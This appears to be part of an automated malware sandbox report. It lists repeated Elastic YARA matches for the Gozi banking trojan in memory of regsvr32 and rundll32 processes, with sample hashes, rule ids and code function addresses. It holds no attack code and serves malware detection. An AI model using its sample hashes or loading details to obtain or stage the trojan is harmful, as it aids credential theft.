                Source: 00000003.00000003.327866790.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000004.00000003.334309214.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000004.00000003.334274758.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000004.00000003.334382473.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000005.00000003.316517152.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000005.00000003.316272023.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000003.00000003.328003234.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000003.00000003.327909266.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000004.00000003.334402235.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000003.00000003.327945021.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000003.00000002.765584818.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000005.00000003.316439588.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000005.00000003.316393149.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000005.00000003.316499527.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000003.00000003.328034529.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000004.00000003.334362499.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000003.00000003.327977652.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000003.00000003.327799913.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000004.00000003.334338335.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000005.00000002.765722433.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000005.00000003.316472185.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000003.00000003.328066581.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000005.00000003.316319573.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: regsvr32.exe PID: 1356, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: Process Memory Space: regsvr32.exe PID: 1356, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: rundll32.exe PID: 1388, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: Process Memory Space: rundll32.exe PID: 1388, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: Process Memory Space: rundll32.exe PID: 5824, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 272
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002284
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002284
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05402DCC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05402792
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054082FC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002284
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041B82FC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041B2792
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_041B2DCC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10002284
